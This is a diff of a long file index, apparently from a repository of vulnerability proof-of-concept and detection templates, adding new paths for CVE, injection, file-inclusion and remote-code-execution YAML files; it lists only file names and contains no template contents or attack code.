 ./poc/cve/CVE-2021-24946.yaml
+./poc/cve/CVE-2021-24947-5775.yaml
 ./poc/cve/CVE-2021-24947-a38442c74b4b964e9891c33a3c89d86f.yaml
 ./poc/cve/CVE-2021-24947.yaml
 ./poc/cve/CVE-2021-24948-43cb73e5880c458fecdd0d8735e9478d.yaml
@@ -17792,6 +17814,7 @@
 ./poc/cve/CVE-2021-24988.yaml
 ./poc/cve/CVE-2021-24989-54d4bf1ec219885cd28ee93225984da9.yaml
 ./poc/cve/CVE-2021-24989.yaml
+./poc/cve/CVE-2021-24991-5779.yaml
 ./poc/cve/CVE-2021-24991-f92a9bd46674029d28cfefafb78ac462.yaml
 ./poc/cve/CVE-2021-24991.yaml
 ./poc/cve/CVE-2021-24992-59cf47e7730d869086870b83f48369ca.yaml
@@ -17966,6 +17989,7 @@
 ./poc/cve/CVE-2021-25073-aad64539b565759033143a8a3c3bdec0.yaml
 ./poc/cve/CVE-2021-25073.yaml
 ./poc/cve/CVE-2021-25074-1dd9748abeee230ec3d16e0e8aaee689.yaml
+./poc/cve/CVE-2021-25074-5799.yaml
 ./poc/cve/CVE-2021-25074.yaml
 ./poc/cve/CVE-2021-25075(1).yaml
 ./poc/cve/CVE-2021-25075-1fd981b13fad947916f8c39fc983ff41.yaml
@@ -18719,6 +18743,7 @@
 ./poc/cve/CVE-2021-39321-0cc8142562329f37716ddb940ba42762.yaml
 ./poc/cve/CVE-2021-39321.yaml
 ./poc/cve/CVE-2021-39322-262084dbc8e5d4ed4776882955e89dac.yaml
+./poc/cve/CVE-2021-39322-6337.yaml
 ./poc/cve/CVE-2021-39322.yaml
 ./poc/cve/CVE-2021-39325-30b86d7c5be08dc63d78d6a517f9a0b6.yaml
 ./poc/cve/CVE-2021-39325.yaml
@@ -18769,6 +18794,7 @@
 ./poc/cve/CVE-2021-39348.yaml
 ./poc/cve/CVE-2021-39349-93c27325ad454645effed2b93bf31844.yaml
 ./poc/cve/CVE-2021-39349.yaml
+./poc/cve/CVE-2021-39350-6343.yaml
 ./poc/cve/CVE-2021-39350-6d840ee8465c162760141f4421d24ddb.yaml
 ./poc/cve/CVE-2021-39350.yaml
 ./poc/cve/CVE-2021-39351-fab896b2fd7f778308c1968bc77302dc.yaml
@@ -19331,6 +19357,7 @@
 ./poc/cve/CVE-2022-0267-bd70bec706ed7913a29e57297694ed67.yaml
 ./poc/cve/CVE-2022-0267.yaml
 ./poc/cve/CVE-2022-0271-6616.yaml
+./poc/cve/CVE-2022-0271-6617.yaml
 ./poc/cve/CVE-2022-0271-d08b1378bcd998d9987a5e5ed83be506.yaml
 ./poc/cve/CVE-2022-0271.yaml
 ./poc/cve/CVE-2022-0279-37686b2be5567f3867bb0a6d87d8ed72.yaml
@@ -19338,6 +19365,7 @@
 ./poc/cve/CVE-2022-0281.yaml
 ./poc/cve/CVE-2022-0287-1e296fa5f0743d9aa817892ba78f13b2.yaml
 ./poc/cve/CVE-2022-0287.yaml
+./poc/cve/CVE-2022-0288(1).yaml
 ./poc/cve/CVE-2022-0288-35b3514a601443f618a7d79da617b48f.yaml
 ./poc/cve/CVE-2022-0288.yaml
 ./poc/cve/CVE-2022-0313-de1d5c6484a4f8052ca4eb03a7ad7a02.yaml
@@ -25269,6 +25297,7 @@
 ./poc/cve/CVE-2023-2298-9520971b55bc1d3e71e812d50052d4d7.yaml
 ./poc/cve/CVE-2023-2298.yaml
 ./poc/cve/CVE-2023-2299-7e695e81d10dd05b794b692772ca0bb3.yaml
+./poc/cve/CVE-2023-2299-dc65b04d2202ad9c581e5d4523d9377b.yaml
 ./poc/cve/CVE-2023-2299.yaml
 ./poc/cve/CVE-2023-2300-fe70e1f10d5d5592278d928cf380a6ed.yaml
 ./poc/cve/CVE-2023-2300.yaml
@@ -25794,6 +25823,7 @@
 ./poc/cve/CVE-2023-2407-99b7693ca225acd68f2de34853ba5b24.yaml
 ./poc/cve/CVE-2023-2407.yaml
 ./poc/cve/CVE-2023-24100.yaml
+./poc/cve/CVE-2023-2414-9f0d12c35523ff4f5d135545493c24b6.yaml
 ./poc/cve/CVE-2023-2414-a38fe00c1282a17b2bcb11ff01d32782.yaml
 ./poc/cve/CVE-2023-2414.yaml
 ./poc/cve/CVE-2023-2415-5de376ba13565bd67530c98131e13dd3.yaml
@@ -33415,6 +33445,7 @@
 ./poc/cve/CVE-2023-7295.yaml
 ./poc/cve/CVE-2023-7296-527f2663670d5ab77193c7bfd28b2b4c.yaml
 ./poc/cve/CVE-2023-7296.yaml
+./poc/cve/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml
 ./poc/cve/CVE-2023–24044.yaml
 ./poc/cve/CVE-2024-0012.yaml
 ./poc/cve/CVE-2024-0015.yaml
@@ -33990,6 +34021,7 @@
 ./poc/cve/CVE-2024-10112-b49134293bd607a2527227eff1da1897.yaml
 ./poc/cve/CVE-2024-10112.yaml
 ./poc/cve/CVE-2024-10113-207a84535abc345595ed49fce69e674b.yaml
+./poc/cve/CVE-2024-10113-5e3997da307eb6c6a9470bf105039eed.yaml
 ./poc/cve/CVE-2024-10113.yaml
 ./poc/cve/CVE-2024-10114-6564102a019f9d71ebb84293fc9159f1.yaml
 ./poc/cve/CVE-2024-10114.yaml
@@ -34070,6 +34102,7 @@
 ./poc/cve/CVE-2024-10285.yaml
 ./poc/cve/CVE-2024-10294-1131fa6d3c45d258c35e83876ed4fab3.yaml
 ./poc/cve/CVE-2024-10294.yaml
+./poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml
 ./poc/cve/CVE-2024-10310-08ea151b2594c4d66f1066377ac5bb02.yaml
 ./poc/cve/CVE-2024-10310.yaml
 ./poc/cve/CVE-2024-10311-ad9b2bf71e997bc9d43308ae128f5343.yaml
@@ -34199,6 +34232,7 @@
 ./poc/cve/CVE-2024-1054.yaml
 ./poc/cve/CVE-2024-10540-c51c8b8ffe37ad945de4a85718f3c6a4.yaml
 ./poc/cve/CVE-2024-10540.yaml
+./poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml
 ./poc/cve/CVE-2024-10543-e240462908e52198328b07cf1527032a.yaml
 ./poc/cve/CVE-2024-10543.yaml
 ./poc/cve/CVE-2024-10544-09e7902ad0b8f33d5cc3104966bee93f.yaml
@@ -34213,11 +34247,13 @@
 ./poc/cve/CVE-2024-1056.yaml
 ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml
 ./poc/cve/CVE-2024-1057.yaml
+./poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
 ./poc/cve/CVE-2024-10571-65e9c11a23f73f8d4720a8ea4b5d4a90.yaml
 ./poc/cve/CVE-2024-10571.yaml
 ./poc/cve/CVE-2024-10577-03e59e27ad2ae9ca6f8945bd8581720d.yaml
 ./poc/cve/CVE-2024-10577-c910dfbedc2df85177b53310160d01a7.yaml
 ./poc/cve/CVE-2024-10577.yaml
+./poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml
 ./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml
 ./poc/cve/CVE-2024-1058.yaml
 ./poc/cve/CVE-2024-10582-7704c1d06076c134a57bf5d19cc06da6.yaml
@@ -34251,6 +34287,8 @@
 ./poc/cve/CVE-2024-10629-332d4937160a02ac721cbe2b6338d39c.yaml
 ./poc/cve/CVE-2024-10629-9071ce95c18df27f4320ef93029b5e1c.yaml
 ./poc/cve/CVE-2024-10629.yaml
+./poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml
+./poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml
 ./poc/cve/CVE-2024-10640-88364cdc0e1cf13f113175b2a7c50048.yaml
 ./poc/cve/CVE-2024-10640.yaml
 ./poc/cve/CVE-2024-10645-12fb06a8e024b16633ddff06befd81c1.yaml
@@ -34277,6 +34315,7 @@
 ./poc/cve/CVE-2024-10675.yaml
 ./poc/cve/CVE-2024-10676-2bafa63d26dbb721ca2c3269f52d08aa.yaml
 ./poc/cve/CVE-2024-10676.yaml
+./poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml
 ./poc/cve/CVE-2024-1068-9cafdd7123cc13ec1ddd7f5534904f5e.yaml
 ./poc/cve/CVE-2024-1068.yaml
 ./poc/cve/CVE-2024-10682-845790654070752f55040438702d276d.yaml
@@ -34323,6 +34362,7 @@
 ./poc/cve/CVE-2024-10726.yaml
 ./poc/cve/CVE-2024-10728-5367c0115b9f0dd84cd056683961ff32.yaml
 ./poc/cve/CVE-2024-10728.yaml
+./poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml
 ./poc/cve/CVE-2024-1073-fbc0c1c17165bd449a27005cce0363e5.yaml
 ./poc/cve/CVE-2024-1073.yaml
 ./poc/cve/CVE-2024-1074-4c296a05497d5bc129c7aee7ddf3b5dd.yaml
@@ -34340,6 +34380,7 @@
 ./poc/cve/CVE-2024-10779.yaml
 ./poc/cve/CVE-2024-1078-39f90c2cfcf5b03de5f108a21d5273bb.yaml
 ./poc/cve/CVE-2024-1078.yaml
+./poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml
 ./poc/cve/CVE-2024-10782-871d48d03543e0a74eec4ebf111104a8.yaml
 ./poc/cve/CVE-2024-10782.yaml
 ./poc/cve/CVE-2024-10785-752c3d56038fb0ae320f03c3f333b1cb.yaml
@@ -34374,6 +34415,7 @@
 ./poc/cve/CVE-2024-10803.yaml
 ./poc/cve/CVE-2024-1081-417d6d8bd1123c156873fbb60bca6fb8.yaml
 ./poc/cve/CVE-2024-1081.yaml
+./poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml
 ./poc/cve/CVE-2024-10813-a08e82184ce8ed05fea7d993edf31c4f.yaml
 ./poc/cve/CVE-2024-10813.yaml
 ./poc/cve/CVE-2024-10814-58a03019f7199f16ebf4bd1bc27b3541.yaml
@@ -34404,8 +34446,10 @@
 ./poc/cve/CVE-2024-10854.yaml
 ./poc/cve/CVE-2024-10855-9797a05382d738af944c2b6cf2c145bc.yaml
 ./poc/cve/CVE-2024-10855.yaml
+./poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml
 ./poc/cve/CVE-2024-10861-c40986779716526ccd0ee5dd3bc07cbf.yaml
 ./poc/cve/CVE-2024-10861.yaml
+./poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml
 ./poc/cve/CVE-2024-10868-8b61cc0ce6d8b3316c7c2c5040692b8a.yaml
 ./poc/cve/CVE-2024-10868.yaml
 ./poc/cve/CVE-2024-10869-69d63f7e251aa82fc4784a3197687316.yaml
@@ -34477,8 +34521,11 @@
 ./poc/cve/CVE-2024-10961.yaml
 ./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml
 ./poc/cve/CVE-2024-10962.yaml
+./poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml
+./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml
 ./poc/cve/CVE-2024-11028-be11a59cf40f1f75ac81807f970e31ef.yaml
 ./poc/cve/CVE-2024-11028.yaml
+./poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml
 ./poc/cve/CVE-2024-11034-e1e9a5b783c2c14bb4a6bb1a32d87b5b.yaml
 ./poc/cve/CVE-2024-11034.yaml
 ./poc/cve/CVE-2024-11036-6d67cff59a0bdc2ab8040040c798d716.yaml
@@ -34499,6 +34546,7 @@
 ./poc/cve/CVE-2024-11089.yaml
 ./poc/cve/CVE-2024-1109-4c10e88fb81ea15210121c0e65900bb8.yaml
 ./poc/cve/CVE-2024-1109.yaml
+./poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml
 ./poc/cve/CVE-2024-11092-082481fd8094c2aeb1f67893a9a2bde4.yaml
 ./poc/cve/CVE-2024-11092.yaml
 ./poc/cve/CVE-2024-11094-16bcde675cb0d64a03b0f91cfb9ac467.yaml
@@ -34511,6 +34559,7 @@
 ./poc/cve/CVE-2024-11104.yaml
 ./poc/cve/CVE-2024-11118-e75c108a13b6a2366005bdd8aa42aa89.yaml
 ./poc/cve/CVE-2024-11118.yaml
+./poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
 ./poc/cve/CVE-2024-1112.yaml
 ./poc/cve/CVE-2024-11143-c1f2d03748f173b3fd4ffd310317801b.yaml
 ./poc/cve/CVE-2024-11143.yaml
@@ -34526,6 +34575,7 @@
 ./poc/cve/CVE-2024-11188.yaml
 ./poc/cve/CVE-2024-1119-f409952ee3d6dca89fd2240564c4bf88.yaml
 ./poc/cve/CVE-2024-1119.yaml
+./poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml
 ./poc/cve/CVE-2024-11194-fef16dd85f2f17cbac8618d7471c25a5.yaml
 ./poc/cve/CVE-2024-11194.yaml
 ./poc/cve/CVE-2024-11195-c691007e253c4054d9b611e5bdf99fc3.yaml
@@ -34539,6 +34589,13 @@
 ./poc/cve/CVE-2024-1120-13d5e470e7a35527e5bda6d36f1caf1b.yaml
 ./poc/cve/CVE-2024-1120-f445687130ddcdec55eaa4fd370ff0a2.yaml
 ./poc/cve/CVE-2024-1120.yaml
+./poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
+./poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
+./poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
+./poc/cve/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
+./poc/cve/CVE-2024-11202-a3d50569bc623538b3b216d3f9a91b14.yaml
+./poc/cve/CVE-2024-11202-b350a46a0cf8d6c6a798fca4fc1a1f4b.yaml
+./poc/cve/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml
 ./poc/cve/CVE-2024-1121-f9acdd7e5d4400d7ac2f5c1f64969230.yaml
 ./poc/cve/CVE-2024-1121.yaml
 ./poc/cve/CVE-2024-1122-5f1c2e67352badc3464a23f2df4684bd.yaml
@@ -34546,6 +34603,7 @@ ./poc/cve/CVE-2024-11224-00fc21f7e5858419f5ee0911bc9c6261.yaml ./poc/cve/CVE-2024-11224.yaml ./poc/cve/CVE-2024-11225-4d2d005fcdf5576ec7648d7b60c4ad7d.yaml +./poc/cve/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml ./poc/cve/CVE-2024-11225.yaml ./poc/cve/CVE-2024-11227-57eaabcac1ab84d3ade4104df773bafb.yaml ./poc/cve/CVE-2024-11227.yaml @@ -34588,6 +34646,7 @@ ./poc/cve/CVE-2024-11334.yaml ./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml ./poc/cve/CVE-2024-1134.yaml +./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml @@ -34630,7 +34689,9 @@ ./poc/cve/CVE-2024-11415-2c88aa7fe4ace40219306434790285d5.yaml ./poc/cve/CVE-2024-11415.yaml ./poc/cve/CVE-2024-11416-5099c1382262f4c1ae7b1e18b601dc1a.yaml +./poc/cve/CVE-2024-11416-5d401293d5cdabfd1d6c6643186015bc.yaml ./poc/cve/CVE-2024-11416.yaml +./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml ./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml ./poc/cve/CVE-2024-11424.yaml ./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml @@ -35728,6 +35789,7 @@ ./poc/cve/CVE-2024-22135.yaml ./poc/cve/CVE-2024-22136-34a690f9392d853c3fefe8bfbd6bf200.yaml ./poc/cve/CVE-2024-22136.yaml +./poc/cve/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml ./poc/cve/CVE-2024-22137-b59443351612e5a86361c1f8a8769449.yaml ./poc/cve/CVE-2024-22137.yaml ./poc/cve/CVE-2024-22138-acdebb06373058f049952bf1613d6c83.yaml @@ -40901,6 +40963,7 @@ ./poc/cve/CVE-2024-38722.yaml ./poc/cve/CVE-2024-38723-659674f0b82a6c7f5d9b3bd3ac53d27b.yaml ./poc/cve/CVE-2024-38723.yaml +./poc/cve/CVE-2024-38724-3c8d6b1f07ad43b57a72ea1136aea82e.yaml ./poc/cve/CVE-2024-38724-657df870da9628bf255b26a03e87a25d.yaml ./poc/cve/CVE-2024-38724.yaml ./poc/cve/CVE-2024-38725-b9cf1c834ec7a1a3c0c10c34370d8bfa.yaml 
@@ -42944,7 +43007,9 @@ ./poc/cve/CVE-2024-47637-b86463f0dc2765a4d996011a29e96b9e.yaml ./poc/cve/CVE-2024-47637.yaml ./poc/cve/CVE-2024-47638-cc703dd87e979196c049d6684cd43aff.yaml +./poc/cve/CVE-2024-47638-e7353821f2fc91f455eddee79fe76776.yaml ./poc/cve/CVE-2024-47638.yaml +./poc/cve/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml ./poc/cve/CVE-2024-47639-cb8110e222e2ba75bd6c450a0e187b23.yaml ./poc/cve/CVE-2024-47639.yaml ./poc/cve/CVE-2024-47640-3da6409578040f0987b44e63a183a809.yaml @@ -44663,6 +44728,7 @@ ./poc/cve/CVE-2024-52376-95ed2a4de1025612b3976e632e2fca33.yaml ./poc/cve/CVE-2024-52376.yaml ./poc/cve/CVE-2024-52377-3267eb46be450012fd8cbdb85f9417fe.yaml +./poc/cve/CVE-2024-52377-892589d65d97802ea2d1e85ee0198106.yaml ./poc/cve/CVE-2024-52377.yaml ./poc/cve/CVE-2024-52378-56638acd103616d3962f2ee8fb33b4cd.yaml ./poc/cve/CVE-2024-52378.yaml @@ -46356,6 +46422,7 @@ ./poc/cve/CVE-2024-8199.yaml ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml ./poc/cve/CVE-2024-8200.yaml +./poc/cve/CVE-2024-8236-ee2436ca05b416e4853b3c95c15d1d9c.yaml ./poc/cve/CVE-2024-8239-c543313e973d5f22b67352b487c06362.yaml ./poc/cve/CVE-2024-8239.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml @@ -46750,6 +46817,7 @@ ./poc/cve/CVE-2024-8873.yaml ./poc/cve/CVE-2024-8874-2a8e27d6f0e26d25ec49d466f4379612.yaml ./poc/cve/CVE-2024-8874.yaml +./poc/cve/CVE-2024-8899-1b8b5da021d4295a4b2ea0914429ae0e.yaml ./poc/cve/CVE-2024-8902-973a09e850f27d16cf400f1ff83278bd.yaml ./poc/cve/CVE-2024-8902.yaml ./poc/cve/CVE-2024-8910-a21139e5574bbe79da0b0184ae2f61a0.yaml @@ -46907,6 +46975,7 @@ ./poc/cve/CVE-2024-9165.yaml ./poc/cve/CVE-2024-9169-f28b64870e010b6c9a9192d27b27621e.yaml ./poc/cve/CVE-2024-9169.yaml +./poc/cve/CVE-2024-9170-852e94b07d2d6cce1f47615e01c1a162.yaml ./poc/cve/CVE-2024-9172-dd6c762e4dc7b5869543b2ed92be27e1.yaml ./poc/cve/CVE-2024-9172.yaml ./poc/cve/CVE-2024-9173-501c69266ea14749b8cc252f701ff522.yaml 
@@ -47021,6 +47090,7 @@ ./poc/cve/CVE-2024-9305.yaml ./poc/cve/CVE-2024-9306-7ba53590edffd095e67bc17955e3e15f.yaml ./poc/cve/CVE-2024-9306.yaml +./poc/cve/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml ./poc/cve/CVE-2024-9307-f97e0d22f048961712c6b4369a193dce.yaml ./poc/cve/CVE-2024-9307.yaml ./poc/cve/CVE-2024-9314-a0c0949919b0d8bc3642420176eab1de.yaml @@ -47128,6 +47198,7 @@ ./poc/cve/CVE-2024-9456.yaml ./poc/cve/CVE-2024-9457-72dd9bc9875b76de9e691aa9064bfa77.yaml ./poc/cve/CVE-2024-9457.yaml +./poc/cve/CVE-2024-9461-4ff08177d4fa4134967742398a5fe2e9.yaml ./poc/cve/CVE-2024-9462-997ea01500055b7e00f4aeed22a63b86.yaml ./poc/cve/CVE-2024-9462.yaml ./poc/cve/CVE-2024-9465.yaml @@ -47139,6 +47210,7 @@ ./poc/cve/CVE-2024-9488.yaml ./poc/cve/CVE-2024-9501-75b9d56a40fe1396bb3b9ef1c7d11ff3.yaml ./poc/cve/CVE-2024-9501.yaml +./poc/cve/CVE-2024-9504-029455c801fdee249681893f5eb0c87b.yaml ./poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml ./poc/cve/CVE-2024-9505.yaml ./poc/cve/CVE-2024-9507-698602582a898ef6e8ecf4cbadd940fc.yaml @@ -47231,6 +47303,7 @@ ./poc/cve/CVE-2024-9613-34d52f215d262d91ee2a7e025d6f5179.yaml ./poc/cve/CVE-2024-9613-749d376baf8bd777cc22e9c75fddf8e1.yaml ./poc/cve/CVE-2024-9613.yaml +./poc/cve/CVE-2024-9614-0ef94d7a238d24553757f1a16696672d.yaml ./poc/cve/CVE-2024-9614-5bab5ff3c4c38aa538cc740404fdd268.yaml ./poc/cve/CVE-2024-9614.yaml ./poc/cve/CVE-2024-9615-442a8d84d3d89fa599dc90faa1dcc085.yaml @@ -47444,6 +47517,7 @@ ./poc/cve/CVE-2024-9967-588327a449d255859025a57006363402.yaml ./poc/cve/CVE-2024-9967.yaml ./poc/cve/CVE-2024-9988-25263bb386e109309253b43397232744.yaml +./poc/cve/CVE-2024-9988-287bf623a719e14be52f61193b77398b.yaml ./poc/cve/CVE-2024-9988.yaml ./poc/cve/CVE-2024-9989-3fc6b24254bebade10a4f6f48d55a380.yaml ./poc/cve/CVE-2024-9989-85df1547f857517fd16293331bfb8543.yaml 
@@ -61433,6 +61507,7 @@ ./poc/header/cl-body-with-header.yaml ./poc/header/cl-body-without-header.yaml ./poc/header/clockwork-php-header.yaml +./poc/header/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/header/custom-header-images-7ee9693683b9e6a4f313fa708316db95.yaml ./poc/header/custom-header-images.yaml ./poc/header/display-via-header-7015.yaml @@ -61855,6 +61930,7 @@ ./poc/ibm/ibmqradarssrf-220331-222931.yaml ./poc/injection/74cms-Template-Injection-rce.yaml ./poc/injection/74cms-v3-Boolean-injection.yaml +./poc/injection/Command Injection.yaml ./poc/injection/GLPI-9.3.3-SQL-Injection.yaml ./poc/injection/Header-Injection.yaml ./poc/injection/PHP - Command injection.yaml @@ -63565,6 +63641,7 @@ ./poc/local_file_inclusion/geovision-geowebserver-lfi-7597.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-xss.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi.yaml +./poc/local_file_inclusion/geowebserver-lfi-xss.yaml ./poc/local_file_inclusion/glassfish-cve-2017-1000028-lfi.yaml ./poc/local_file_inclusion/glassfish-cve-2017-1000028-lfi.yml ./poc/local_file_inclusion/global-domains-lfi-7714.yaml @@ -81599,6 +81676,7 @@ ./poc/other/appointments.yaml ./poc/other/appointmind-09668263722b04d1768b724964ea3a78.yaml ./poc/other/appointmind.yaml +./poc/other/apppresser-05523ca99a6812ce9a8ee1b96d42e704.yaml ./poc/other/apppresser-0d39571fcc6ff35900e0cc5116b3a739.yaml ./poc/other/apppresser-18e0253d8b89b2d1babd703baa6feb93.yaml ./poc/other/apppresser-386c9f5c1ed425e828aaa5c5f20c5994.yaml @@ -83273,6 +83351,7 @@ ./poc/other/bluepacific-network-monitoring-system.yaml ./poc/other/bluepacific-share-content-management-system.yaml ./poc/other/bluequartz.yaml +./poc/other/bluetrait-event-viewer-401534e15701284d7d10ed528a79ca69.yaml ./poc/other/bmc-discovery-panel.yaml ./poc/other/bmi-adultkid-calculator-96ecc70fc0bda6727e6c2b648dfca9ac.yaml ./poc/other/bmi-adultkid-calculator.yaml 
@@ -83391,6 +83470,7 @@ ./poc/other/booking-calendar-9c2e41ba06cd413d23ad4f23cb5b179d.yaml ./poc/other/booking-calendar-ab424c39e49817e4bacde002edf8f7ab.yaml ./poc/other/booking-calendar-b1f8bd0364cb10220e31fb1442623206.yaml +./poc/other/booking-calendar-b3cd350c4619e9b5bfb265fa7add2acb.yaml ./poc/other/booking-calendar-contact-form-07501663c3f7391e008694dfedd45ffb.yaml ./poc/other/booking-calendar-contact-form-20c5add8fc3bbed4d9c62ed715734952.yaml ./poc/other/booking-calendar-contact-form-55f90ef4a4122034b941f6abf0cf8cc1.yaml @@ -85380,6 +85460,7 @@ ./poc/other/cleantalk-spam-protect-9acd5e3283aab4c8de397d5884320efe.yaml ./poc/other/cleantalk-spam-protect-9ce4c8cb08148b7c233fcd0866b178c8.yaml ./poc/other/cleantalk-spam-protect-a47f30d156405819f9ae4830cdf44da6.yaml +./poc/other/cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b.yaml ./poc/other/cleantalk-spam-protect-c6ce0e53b47caf48b1f6a4d49c641b09.yaml ./poc/other/cleantalk-spam-protect-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/cleantalk-spam-protect-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -89513,6 +89594,7 @@ ./poc/other/elementor-25a90f5f19fbffdd62205bd284878589.yaml ./poc/other/elementor-28951e2c7c7e3863067865ae74f6f34e.yaml ./poc/other/elementor-2b29a94bb0636efa54fd518693aafbdf.yaml +./poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml ./poc/other/elementor-30bed69a3066a11bde1e59215e3cd5b4.yaml ./poc/other/elementor-32f0ca887f580098243f40cf3ab99a89.yaml ./poc/other/elementor-404bc74d32cb335460b4bb18ffb6189d.yaml @@ -94919,6 +95001,7 @@ ./poc/other/inoerp.yaml ./poc/other/inpost-gallery-05923d53a56de919b30b40eead2d4f0d.yaml ./poc/other/inpost-gallery-1cc1cf9dc34095b462a7b36e1a07f468.yaml +./poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml ./poc/other/inpost-gallery-30a8eed5c8ace9ae3ebf27a2b3d3c48f.yaml ./poc/other/inpost-gallery-39660b2f4aa12b92e724e426fad6858f.yaml ./poc/other/inpost-gallery-5c919e6a8d1a84a5c638c910a2146351.yaml 
@@ -95431,6 +95514,8 @@ ./poc/other/jeg-elementor-kit-063de975442816899ef155fb809079f2.yaml ./poc/other/jeg-elementor-kit-4cf0787c619900a280b89198c79cf014.yaml ./poc/other/jeg-elementor-kit-5f025932a34c24ebbc4f3682c9fd0dd0.yaml +./poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml +./poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml ./poc/other/jeg-elementor-kit-890e5d7bb2d815b66d00fc359ad7802a.yaml ./poc/other/jeg-elementor-kit-bf68c9e5b4940e0fffb1c7b9d8a2bb12.yaml ./poc/other/jeg-elementor-kit-cf9577e1035d13408577f5b75c148fdd.yaml @@ -105286,6 +105371,7 @@ ./poc/other/security-antivirus-firewall.yaml ./poc/other/security-intelligent-management-platform.yaml ./poc/other/security-malware-firewall-45c526c3982a209b165f42c75f6d6d27.yaml +./poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml ./poc/other/security-malware-firewall-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/security-malware-firewall-dd7677218d06062b63b3b9c9bd4421bc.yaml ./poc/other/security-malware-firewall-decb939cf215a64a558e595514dc78a2.yaml @@ -106735,6 +106821,7 @@ ./poc/other/skt-blocks.yaml ./poc/other/skt-builder-4bd16f8f24d2e7611b44c8722a5fa5fe.yaml ./poc/other/skt-builder.yaml +./poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml ./poc/other/skt-skill-bar-2a90fea13e740436d6a27da4e1f30a54.yaml ./poc/other/skt-skill-bar.yaml ./poc/other/skt-templates-6ea51ea0d3a1d93e2c17e97220b99e93.yaml @@ -108190,6 +108277,7 @@ ./poc/other/support-genix-lite-64c576dc3e88ee994a3bf9f765a979d3.yaml ./poc/other/support-genix-lite.yaml ./poc/other/support-incident-tracker.yaml +./poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml ./poc/other/support-svg-87618674bc040c3728ffe4d418498d28.yaml ./poc/other/support-svg.yaml ./poc/other/supportboard-22d7d8b56e3f5cc2f25795cfd9f22c6c.yaml 
@@ -115186,6 +115274,7 @@ ./poc/remote_code_execution/addify-price-calculator-for-woocommerce-4a7e8b5b59d549e72ea5394d21cd6f96.yaml ./poc/remote_code_execution/addify-price-calculator-for-woocommerce.yaml ./poc/remote_code_execution/additional-order-filters-for-woocommerce-1fad26bd045c94518bdeba69fabc119c.yaml +./poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml ./poc/remote_code_execution/additional-order-filters-for-woocommerce.yaml ./poc/remote_code_execution/additional-product-fields-for-woocommerce-40af5cb517ce82bb3113102e2280db01.yaml ./poc/remote_code_execution/additional-product-fields-for-woocommerce-783267b19d4547eb98d4ac23fab700fb.yaml @@ -116749,6 +116838,7 @@ ./poc/remote_code_execution/product-gtin-ean-upc-isbn-for-woocommerce.yaml 